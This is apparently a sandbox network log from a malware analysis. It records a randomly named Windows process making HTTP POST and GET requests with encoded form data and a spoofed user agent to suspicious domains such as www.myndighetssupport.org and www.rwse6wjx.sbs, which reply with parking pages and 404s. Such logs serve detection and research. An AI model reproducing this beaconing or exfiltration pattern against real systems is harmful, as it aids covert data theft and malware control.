Jan 11, 2025 07:58:54.687753916 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 06:58:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.30 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 11, 2025 07:58:54.687772989 CET	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jan 11, 2025 07:58:54.687797070 CET	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jan 11, 2025 07:58:54.687813044 CET	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Jan 11, 2025 07:58:54.687824011 CET	878	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	50005	194.9.94.86	80	5568	C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:58:56.602050066 CET	10885	OUT	POST /2k8x/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.myndighetssupport.org Origin: http://www.myndighetssupport.org Referer: http://www.myndighetssupport.org/2k8x/ Cache-Control: max-age=0 Connection: close Content-Length: 10299 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.68 Mobile/12B466 Safari/600.1.4 Data Raw: 36 76 3d 30 6c 44 39 45 69 6f 6c 44 68 46 59 4f 38 46 75 6e 73 44 77 49 2f 44 4b 42 6f 64 4f 35 41 67 52 6f 46 36 67 37 2f 76 2b 78 72 48 75 30 55 67 52 45 56 51 6d 75 6c 43 5a 79 30 67 44 32 74 68 69 50 63 37 4f 50 32 72 52 63 39 6b 71 59 54 6f 33 4a 67 4d 42 43 67 6a 41 33 69 7a 47 30 6d 7a 4c 52 56 30 4a 66 54 4a 4c 61 41 6e 43 38 67 7a 67 61 49 58 2b 6c 61 63 73 39 36 73 4c 48 6f 43 57 65 32 31 32 42 71 32 4a 74 31 51 6a 4a 70 5a 56 6f 6a 69 6a 68 41 56 77 71 69 69 6e 4b 69 32 4c 45 61 4c 71 6d 4d 66 50 67 6b 66 6e 6a 41 68 77 4b 41 35 65 37 62 75 6b 31 41 7a 54 66 5a 6e 42 4f 43 6f 6a 76 73 44 47 59 62 75 6a 74 4e 73 65 67 79 4d 63 36 78 57 71 49 39 6b 58 36 57 48 50 75 71 37 52 78 2b 37 63 70 62 34 30 70 50 53 62 62 79 6e 69 73 6b 4e 39 41 67 53 52 54 69 2f 38 77 65 44 67 4d 50 67 70 6c 62 46 79 42 42 39 74 35 54 54 2b 4a 49 4b 71 4f 52 35 53 6c 48 75 4b 49 65 54 62 36 33 64 41 32 66 51 4b 2b 6d 55 74 4e 35 44 4c 79 49 41 75 54 33 68 6b 69 45 56 6e 6a 61 6d 46 39 55 50 52 5a 41 59 55 52 6f 33 [TRUNCATED] Data Ascii: 6v=0lD9EiolDhFYO8FunsDwI/DKBodO5AgRoF6g7/v+xrHu0UgREVQmulCZy0gD2thiPc7OP2rRc9kqYTo3JgMBCgjA3izG0mzLRV0JfTJLaAnC8gzgaIX+lacs96sLHoCWe212Bq2Jt1QjJpZVojijhAVwqiinKi2LEaLqmMfPgkfnjAhwKA5e7buk1AzTfZnBOCojvsDGYbujtNsegyMc6xWqI9kX6WHPuq7Rx+7cpb40pPSbbyniskN9AgSRTi/8weDgMPgplbFyBB9t5TT+JIKqOR5SlHuKIeTb63dA2fQK+mUtN5DLyIAuT3hkiEVnjamF9UPRZAYURo33WSVwjaOabVSHLGN93oEMm2s7JGnhrctyJcUShPHKqWP4xstfkE8Gqn46FSuae2dBYN/pnthRujbEf5iQQbWUq2jHLEy606N2VaqFlxi82NV0805PWCQIuShO5lTy/gFoicAqrOjjxSxx/w5dLFn4zBtVqSdYw/NZqoNmZZxf4U7/FID78uvBbwlrvx/BgElMgoKC01u+XCE7WMUiVQKQWN8dv8uyCUtHSp2ogamlX2AR3QKD/hWf+I8Na/NrGi41vj7g2N/nr6Z0T7PVOHKmvtPbo+xxzMF4MGZmfQqDknFRbnCICPWHTtQ4V3/KbXverM0xprAC/sQu+uFqVO/ItY5mYKaAPVLkfbjqzGaSX7ARQkxRGwdN5H2OJ92dfIWME8PyabV3fQl9LXZk4YbcErlHBsl+FRDyIL2pIKYB4wUh/ntI4lbr3GeTUr1DXyNp+N2DT1juQGR+Hv2Q1S7ENbZLh/oX28Pm1+TrgDvvua0VVziobT8MUU+I8X7IX2nNgtNSjMzwJ1VZlqDbXIg8/+QMKG+TYxV1JsdUAdedWVJRbRNw1gXItDm1XZJRq85isYMSt4tviSXMDBrxbz8Tr1fRDP8eXtWweA8CSGPd83DbawPV6pmrjoKVHEmSEid+/mBq44lQEly1vDzpoaAnhstJCcKElj1Bm [TRUNCATED]
Jan 11, 2025 07:58:57.260889053 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 06:58:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.30 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 11, 2025 07:58:57.260904074 CET	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jan 11, 2025 07:58:57.260919094 CET	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jan 11, 2025 07:58:57.260941029 CET	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Jan 11, 2025 07:58:57.260951996 CET	878	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	50006	194.9.94.86	80	5568	C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:58:59.154455900 CET	503	OUT	GET /2k8x/?f2yX=YHuxGZkXvzspJ&6v=5nrdHWUNGS1CeY1Dh+rNddjFA4ZoxwgtjTeQm53Oktjb1QtNMH0S/EnF9U1Zn/JeNK36dHzBWfQ8GG9tXE0SKiGA5TTa6RuRaUI/YxJ3aHSvnxfPbfXWpMw= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.myndighetssupport.org Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.68 Mobile/12B466 Safari/600.1.4
Jan 11, 2025 07:58:59.786290884 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 06:58:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.30 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 11, 2025 07:58:59.786324978 CET	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jan 11, 2025 07:58:59.786338091 CET	448	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jan 11, 2025 07:58:59.786350965 CET	1236	IN	Data Raw: 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 50 72 6f 74 65 63 74 20 79 6f 75 72 20 Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
Jan 11, 2025 07:58:59.786361933 CET	1236	IN	Data Raw: 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
Jan 11, 2025 07:58:59.786379099 CET	430	IN	Data Raw: 77 77 2e 6c 6f 6f 70 69 61 2e 73 65 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	50007	101.32.205.61	80	5568	C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:14.437014103 CET	756	OUT	POST /6xqt/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.rwse6wjx.sbs Origin: http://www.rwse6wjx.sbs Referer: http://www.rwse6wjx.sbs/6xqt/ Cache-Control: max-age=0 Connection: close Content-Length: 199 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.68 Mobile/12B466 Safari/600.1.4 Data Raw: 36 76 3d 30 38 61 68 70 78 59 76 2f 77 56 32 74 39 61 77 57 74 4f 43 67 6e 72 4d 6b 61 38 30 31 2b 30 73 6e 6e 48 2b 42 5a 4b 62 53 62 4c 55 36 4c 4c 46 4f 69 45 50 7a 36 4a 57 4f 2b 79 4b 76 2f 5a 41 71 76 6f 54 59 32 78 47 44 45 6d 30 7a 63 62 69 52 36 35 6d 52 74 64 5a 41 31 6f 71 53 50 45 68 4a 69 5a 70 43 54 4a 4f 58 57 53 4d 64 71 71 52 4c 79 5a 39 4e 53 78 45 71 73 45 4d 42 43 6f 49 36 59 4c 38 75 4c 68 41 74 32 78 4a 46 67 54 6e 69 78 6f 4d 6e 6c 52 6d 64 30 74 46 36 63 44 50 76 4d 31 2b 35 71 6d 43 72 56 51 61 6f 50 4b 2b 41 39 5a 54 58 43 44 71 79 58 58 69 4a 48 77 38 46 41 3d 3d Data Ascii: 6v=08ahpxYv/wV2t9awWtOCgnrMka801+0snnH+BZKbSbLU6LLFOiEPz6JWO+yKv/ZAqvoTY2xGDEm0zcbiR65mRtdZA1oqSPEhJiZpCTJOXWSMdqqRLyZ9NSxEqsEMBCoI6YL8uLhAt2xJFgTnixoMnlRmd0tF6cDPvM1+5qmCrVQaoPK+A9ZTXCDqyXXiJHw8FA==
Jan 11, 2025 07:59:15.347745895 CET	306	IN	HTTP/1.1 404 Not Found Server: Tengine Date: Sat, 11 Jan 2025 06:59:15 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	50008	101.32.205.61	80	5568	C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:16.993103027 CET	776	OUT	POST /6xqt/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.rwse6wjx.sbs Origin: http://www.rwse6wjx.sbs Referer: http://www.rwse6wjx.sbs/6xqt/ Cache-Control: max-age=0 Connection: close Content-Length: 219 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.68 Mobile/12B466 Safari/600.1.4 Data Raw: 36 76 3d 30 38 61 68 70 78 59 76 2f 77 56 32 74 64 71 77 55 4f 6d 43 69 48 72 50 68 61 38 30 75 75 30 6f 6e 6e 4c 2b 42 59 4f 79 54 70 76 55 2f 62 37 46 66 54 45 50 79 36 4a 57 58 4f 79 4c 33 66 5a 4c 71 76 6b 62 59 33 4e 47 44 41 4f 30 7a 64 72 69 52 49 52 6c 51 39 64 62 4c 56 6f 73 59 76 45 68 4a 69 5a 70 43 54 4d 6c 58 57 4b 4d 64 5a 79 52 4c 57 74 38 46 79 78 62 39 63 45 4d 46 43 6f 45 36 59 4c 65 75 4b 74 75 74 77 31 4a 46 68 6a 6e 69 67 6f 4c 74 6c 51 4d 5a 30 73 70 7a 70 61 65 76 63 45 53 35 5a 44 6a 68 47 59 5a 67 70 48 6b 52 4d 34 45 46 43 6e 5a 76 51 65 57 45 45 4e 31 65 4d 77 69 57 46 79 57 6a 74 4f 44 50 66 58 69 53 4e 32 39 30 36 30 3d Data Ascii: 6v=08ahpxYv/wV2tdqwUOmCiHrPha80uu0onnL+BYOyTpvU/b7FfTEPy6JWXOyL3fZLqvkbY3NGDAO0zdriRIRlQ9dbLVosYvEhJiZpCTMlXWKMdZyRLWt8Fyxb9cEMFCoE6YLeuKtutw1JFhjnigoLtlQMZ0spzpaevcES5ZDjhGYZgpHkRM4EFCnZvQeWEEN1eMwiWFyWjtODPfXiSN29060=
Jan 11, 2025 07:59:17.870616913 CET	306	IN	HTTP/1.1 404 Not Found Server: Tengine Date: Sat, 11 Jan 2025 06:59:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
